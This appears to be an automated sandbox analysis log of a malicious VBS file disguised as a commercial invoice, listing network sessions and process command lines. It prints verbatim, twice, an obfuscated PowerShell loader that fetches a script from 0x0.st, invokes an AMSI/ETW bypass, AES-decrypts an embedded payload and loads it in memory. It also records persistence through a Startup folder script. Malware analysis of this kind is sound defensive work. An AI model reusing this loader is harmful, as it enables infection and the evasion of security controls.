                                        2025-02-18 07:24:35 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.8 | 49710 | 168.119.145.117 | 443 | 1984 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-02-18 07:24:49 UTC | 159 | OUT | GET /8ZDa.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 0x0.st
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:49 UTC | 611 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 18 Feb 2025 07:24:49 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 9193
                                        Last-Modified: Thu, 13 Feb 2025 16:29:51 GMT
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "67ae1dff-23e9"
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Frame-Options: sameorigin
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Content-Security-Policy: default-src 'none'; media-src 'self'; style-src 'none' 'unsafe-inline'; img-src 'self'
                                        Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                        Accept-Ranges: bytes
                                        2025-02-18 07:24:49 UTC | 9193 | IN | Data Raw: 66 75 6e 63 74 69 6f 6e 20 49 6e 76 6f 6b 65 2d 53 79 73 74 65 6d 41 6d 73 69 42 79 70 61 73 73 20 7b 0d 0a 20 20 20 20 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79 20 3d 20 24 66 61 6c 73 65 2c 20 50 6f 73 69 74 69 6f 6e 20 3d 20 30 29 5d 0d 0a 20 20 20 20 20 20 20 20 5b 73 77 69 74 63 68 5d 20 24 56 65 72 62 6f 73 65 4f 75 74 70 75 74 2c 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79
                                        Data Ascii: function Invoke-SystemAmsiBypass { [CmdletBinding()] param ( [Parameter(ParameterSetName = 'Interface', Mandatory = $false, Position = 0)] [switch] $VerboseOutput, [Parameter(ParameterSetName = 'Interface', Mandatory


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.8 | 49712 | 104.21.16.1 | 443 | 1984 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2025-02-18 07:24:52 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:52 UTC | 861 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:52 GMT
                                        Content-Type: text/xml
                                        Content-Length: 362
                                        Connection: close
                                        Age: 95260
                                        Cache-Control: max-age=31536000
                                        cf-cache-status: HIT
                                        last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tbUCLzOgExcmd1d36zb%2B%2FXw8mAKYnSc2NTQVXPEAdVHEBvfhMwzD2wxYd3qLIn005GKD3jmfm04K4Xq9G9%2F7xhcABGohtOkXvl4%2B0%2FAuQHYL0K32uD%2BK2isgH4I9wH0U172AGh%2B"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 913c47a9ca7641ba-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1659&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=198&unsent_bytes=0&cid=b94a7bbc13eddeeb&ts=140&x=0"
                                        2025-02-18 07:24:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo



                                        Target ID:0
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
                                        Imagebase:0x7ff669a40000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:6
                                        Start time:02:24:29
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object 
System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:02:24:29
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:8
                                        Start time:02:24:30
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:12
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:13
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:14
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function 
SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:16
                                        Start time:02:24:46
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true
